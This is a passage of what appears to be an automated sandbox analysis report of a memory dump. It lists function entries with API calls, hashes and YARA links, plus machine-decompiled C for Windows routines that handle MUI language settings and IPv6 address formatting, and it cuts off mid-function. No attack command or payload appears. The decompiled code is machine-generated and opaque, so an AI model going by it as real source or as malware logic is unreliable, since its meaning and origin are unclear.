                                                                                                                                                    • Instruction Fuzzy Hash: 2D015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D86B1, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFB2,000CCFB2,?,00000000,?,?), ref: 000D8670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 8071ae7b3d782e54f1a8dc2a3400789adbeb8eea812246892fb8ebb861f920df
                                                                                                                                                    • Instruction ID: cef9ff4445362ccc9e47392801dbaef9cc255e5d70a7e0f89ee2c9ca78827829
                                                                                                                                                    • Opcode Fuzzy Hash: 8071ae7b3d782e54f1a8dc2a3400789adbeb8eea812246892fb8ebb861f920df
                                                                                                                                                    • Instruction Fuzzy Hash: 33F0C275201204AFDB10DF68DC81CA777A8EF88320B01868AF84C97353D631E915CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D7020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCCE0,?,?), ref: 000D705C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: 5e820ab73cdadbf1468b2c642f581bbf31c518ef26bc2b454088f6ce9a9c7621
                                                                                                                                                    • Instruction ID: 369763d78e6bcecbcad73227295d9095df0386fd7ac6a7c45f05cd8fa797bf99
                                                                                                                                                    • Opcode Fuzzy Hash: 5e820ab73cdadbf1468b2c642f581bbf31c518ef26bc2b454088f6ce9a9c7621
                                                                                                                                                    • Instruction Fuzzy Hash: 67E06D333803043AE2306599AC03FE7B39CCB81B20F140026FB0DEA2C2D595F80142A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D8631, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFB2,000CCFB2,?,00000000,?,?), ref: 000D8670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: e6043566ab8b8981af5b4f73ac90f845fcc849ef4f5839948e40dfdcde5837b5
                                                                                                                                                    • Instruction ID: 68c340383aa7635d66a727f80a68cfe27010c5f8b0ddcbf369d01f00e45ae02d
                                                                                                                                                    • Opcode Fuzzy Hash: e6043566ab8b8981af5b4f73ac90f845fcc849ef4f5839948e40dfdcde5837b5
                                                                                                                                                    • Instruction Fuzzy Hash: 1CF030B56012146BDB14DF54DC80FEB37A9EF89750F018055FE585B282D935E8118BB5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D8640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFB2,000CCFB2,?,00000000,?,?), ref: 000D8670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction ID: 30529664d6131deb01bdfa5cfb5e64acde9ee640e9ffe41405b61f1b1f10282b
                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction Fuzzy Hash: 5DE01AB12003086BDB10DF49CC85EE737ADAF88650F018155BA0857282C930E8108BF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000CD417, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C73,?), ref: 000CD44B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    • Opcode ID: 8372fc1ac696c22986d857952e26473ad425ce5c576a8e45821320c288cb46d7
                                                                                                                                                    • Instruction ID: 9ecf6bebf6500fd5b07d0d236daf95847375c09707e782bc85ade4d4d1ae63e4
                                                                                                                                                    • Opcode Fuzzy Hash: 8372fc1ac696c22986d857952e26473ad425ce5c576a8e45821320c288cb46d7
                                                                                                                                                    • Instruction Fuzzy Hash: 4AD0C2713403052BE600FF94CC43F1672C8AB84B01F050064F5489B3C3DA20E5428122
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000CD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C73,?), ref: 000CD44B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction ID: 6f16421cce525bc0c062ea32c4aaa86506d2c3108303d1a48dda4cc10fdc5814
                                                                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E617503042BE610BBA49C03F6672C85B44B00F494074FA48963C3D964E5004162
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 02048788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E02048788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02048460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0202E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0204718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02048460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0204718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02048460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02048460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02048460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0204718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0202E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02022340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0203E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0202E2A8(_t322,  &_v68, _v16);
								if(E02045553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0203E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0202E2A8(_t322,  &_v68, _t236);
								if(E02045553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0204718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0202E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02022340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0203E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0202E2A8(_v12,  &_v68, _v16);
							if(E02045553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0203E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0202E2A8(_t322,  &_v68, _t269);
							if(E02045553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0204718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0202E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02022340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0203E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0202E2A8(_v12,  &_v68, _v16);
						if(E02045553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0203E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0202E2A8(_t322,  &_v68, _t296);
						if(E02045553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                    0x02048788
                                                                                                                                                    0x02048788
                                                                                                                                                    0x02048791
                                                                                                                                                    0x02048794
                                                                                                                                                    0x02048798
                                                                                                                                                    0x0204879b
                                                                                                                                                    0x0204879e
                                                                                                                                                    0x020487a1
                                                                                                                                                    0x020487a4
                                                                                                                                                    0x020487a7
                                                                                                                                                    0x020487aa
                                                                                                                                                    0x020487af
                                                                                                                                                    0x02091ad3
                                                                                                                                                    0x02048b0a
                                                                                                                                                    0x02048b0d
                                                                                                                                                    0x02048b13
                                                                                                                                                    0x02048b19
                                                                                                                                                    0x02048b1f
                                                                                                                                                    0x02048b25
                                                                                                                                                    0x02048b2b
                                                                                                                                                    0x02048b31
                                                                                                                                                    0x02048b37
                                                                                                                                                    0x02048b3d
                                                                                                                                                    0x02048b46
                                                                                                                                                    0x02048b46
                                                                                                                                                    0x020487c6
                                                                                                                                                    0x020487d0
                                                                                                                                                    0x02091ae0
                                                                                                                                                    0x02091ae6
                                                                                                                                                    0x02091af8
                                                                                                                                                    0x02091af8
                                                                                                                                                    0x02091afd
                                                                                                                                                    0x02091afe
                                                                                                                                                    0x02091b01
                                                                                                                                                    0x02091b06
                                                                                                                                                    0x02091b06
                                                                                                                                                    0x020487d6
                                                                                                                                                    0x020487f2
                                                                                                                                                    0x020487f7
                                                                                                                                                    0x02048807
                                                                                                                                                    0x0204880a
                                                                                                                                                    0x0204880f
                                                                                                                                                    0x02048810
                                                                                                                                                    0x02048813
                                                                                                                                                    0x02048818
                                                                                                                                                    0x02048818
                                                                                                                                                    0x0204882c
                                                                                                                                                    0x02048831
                                                                                                                                                    0x02048838
                                                                                                                                                    0x02048908
                                                                                                                                                    0x02048920
                                                                                                                                                    0x020489f0
                                                                                                                                                    0x02048a08
                                                                                                                                                    0x02048af6
                                                                                                                                                    0x02048af6
                                                                                                                                                    0x02048af8
                                                                                                                                                    0x02048afb
                                                                                                                                                    0x02091beb
                                                                                                                                                    0x02091beb
                                                                                                                                                    0x02048b04
                                                                                                                                                    0x02091bf8
                                                                                                                                                    0x02091c0e
                                                                                                                                                    0x02091c13
                                                                                                                                                    0x02091c16
                                                                                                                                                    0x02091c16
                                                                                                                                                    0x02091bf8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048b04
                                                                                                                                                    0x02048a0e
                                                                                                                                                    0x02048a11
                                                                                                                                                    0x02048a14
                                                                                                                                                    0x02048a15
                                                                                                                                                    0x02048a18
                                                                                                                                                    0x02048a22
                                                                                                                                                    0x02048b59
                                                                                                                                                    0x02048a28
                                                                                                                                                    0x02048a3c
                                                                                                                                                    0x02048a3c
                                                                                                                                                    0x02048a42
                                                                                                                                                    0x02091bb0
                                                                                                                                                    0x02091b11
                                                                                                                                                    0x02091b11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048a48
                                                                                                                                                    0x02048a51
                                                                                                                                                    0x02048a5b
                                                                                                                                                    0x02048a5e
                                                                                                                                                    0x02048a61
                                                                                                                                                    0x02048a69
                                                                                                                                                    0x02048a69
                                                                                                                                                    0x02048a6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048a74
                                                                                                                                                    0x02048a7c
                                                                                                                                                    0x02048a7d
                                                                                                                                                    0x02048a91
                                                                                                                                                    0x02048a93
                                                                                                                                                    0x02048a93
                                                                                                                                                    0x02048a98
                                                                                                                                                    0x02048a9b
                                                                                                                                                    0x02048aa1
                                                                                                                                                    0x02048aa1
                                                                                                                                                    0x02048aa4
                                                                                                                                                    0x02048aaa
                                                                                                                                                    0x02048ab1
                                                                                                                                                    0x02048ac5
                                                                                                                                                    0x02048ac7
                                                                                                                                                    0x02048ac7
                                                                                                                                                    0x02048ac5
                                                                                                                                                    0x02048ace
                                                                                                                                                    0x02091bc9
                                                                                                                                                    0x02091bce
                                                                                                                                                    0x02091bd2
                                                                                                                                                    0x02091bd2
                                                                                                                                                    0x02048ad8
                                                                                                                                                    0x02048aeb
                                                                                                                                                    0x02048aeb
                                                                                                                                                    0x02048af0
                                                                                                                                                    0x02048af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048af4
                                                                                                                                                    0x02048a42
                                                                                                                                                    0x02048926
                                                                                                                                                    0x02048929
                                                                                                                                                    0x0204892c
                                                                                                                                                    0x0204892d
                                                                                                                                                    0x02048930
                                                                                                                                                    0x02048935
                                                                                                                                                    0x0204893a
                                                                                                                                                    0x02048b51
                                                                                                                                                    0x02048940
                                                                                                                                                    0x02048954
                                                                                                                                                    0x02048954
                                                                                                                                                    0x0204895a
                                                                                                                                                    0x02091b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048960
                                                                                                                                                    0x02048969
                                                                                                                                                    0x02048973
                                                                                                                                                    0x02048976
                                                                                                                                                    0x02048979
                                                                                                                                                    0x0204897e
                                                                                                                                                    0x02048981
                                                                                                                                                    0x02048981
                                                                                                                                                    0x02048986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02091b6e
                                                                                                                                                    0x02091b74
                                                                                                                                                    0x02091b7b
                                                                                                                                                    0x02091b8f
                                                                                                                                                    0x02091b91
                                                                                                                                                    0x02091b91
                                                                                                                                                    0x02091b99
                                                                                                                                                    0x02091b9c
                                                                                                                                                    0x02091ba2
                                                                                                                                                    0x02091ba2
                                                                                                                                                    0x0204898c
                                                                                                                                                    0x02048992
                                                                                                                                                    0x02048999
                                                                                                                                                    0x020489ad
                                                                                                                                                    0x02091ba8
                                                                                                                                                    0x02091ba8
                                                                                                                                                    0x020489ad
                                                                                                                                                    0x020489b6
                                                                                                                                                    0x020489c8
                                                                                                                                                    0x020489cd
                                                                                                                                                    0x020489d0
                                                                                                                                                    0x020489d0
                                                                                                                                                    0x020489d6
                                                                                                                                                    0x020489e8
                                                                                                                                                    0x020489e8
                                                                                                                                                    0x020489ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020489ed
                                                                                                                                                    0x0204895a
                                                                                                                                                    0x0204883e
                                                                                                                                                    0x02048841
                                                                                                                                                    0x02048844
                                                                                                                                                    0x02048845
                                                                                                                                                    0x02048848
                                                                                                                                                    0x0204884d
                                                                                                                                                    0x02048852
                                                                                                                                                    0x02048b49
                                                                                                                                                    0x02048858
                                                                                                                                                    0x0204886c
                                                                                                                                                    0x0204886c
                                                                                                                                                    0x02048872
                                                                                                                                                    0x02091b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048878
                                                                                                                                                    0x02048881
                                                                                                                                                    0x0204888b
                                                                                                                                                    0x0204888e
                                                                                                                                                    0x02048891
                                                                                                                                                    0x02048896
                                                                                                                                                    0x02048899
                                                                                                                                                    0x02048899
                                                                                                                                                    0x0204889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02091b21
                                                                                                                                                    0x02091b27
                                                                                                                                                    0x02091b2e
                                                                                                                                                    0x02091b42
                                                                                                                                                    0x02091b44
                                                                                                                                                    0x02091b44
                                                                                                                                                    0x02091b4c
                                                                                                                                                    0x02091b4f
                                                                                                                                                    0x02091b55
                                                                                                                                                    0x02091b55
                                                                                                                                                    0x020488a4
                                                                                                                                                    0x020488aa
                                                                                                                                                    0x020488b1
                                                                                                                                                    0x020488c5
                                                                                                                                                    0x02091b5b
                                                                                                                                                    0x02091b5b
                                                                                                                                                    0x020488c5
                                                                                                                                                    0x020488ce
                                                                                                                                                    0x020488e0
                                                                                                                                                    0x020488e5
                                                                                                                                                    0x020488e8
                                                                                                                                                    0x020488e8
                                                                                                                                                    0x020488ee
                                                                                                                                                    0x02048900
                                                                                                                                                    0x02048900
                                                                                                                                                    0x02048905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02048914
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 020487E6
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 020489FC
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 02048827
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 020487C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: cfb77aa8b608c4e9e6c60f3ef62f3e9edc8c254b15a2d9201f4131170d9a16a4
                                                                                                                                                    • Instruction ID: 0a1d04ae538adddae67da9514051c95a4736a86866b952d7da35eb3596d0c228
                                                                                                                                                    • Opcode Fuzzy Hash: cfb77aa8b608c4e9e6c60f3ef62f3e9edc8c254b15a2d9201f4131170d9a16a4
                                                                                                                                                    • Instruction Fuzzy Hash: 2EF1C6B1D00319EFDF51EF99C9849EEB7B9BF08304F14846AE505A7210EB34AA45EF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 020613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E020613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02057707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2022926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02057707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2029cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02057707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02057707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02057707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02057707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
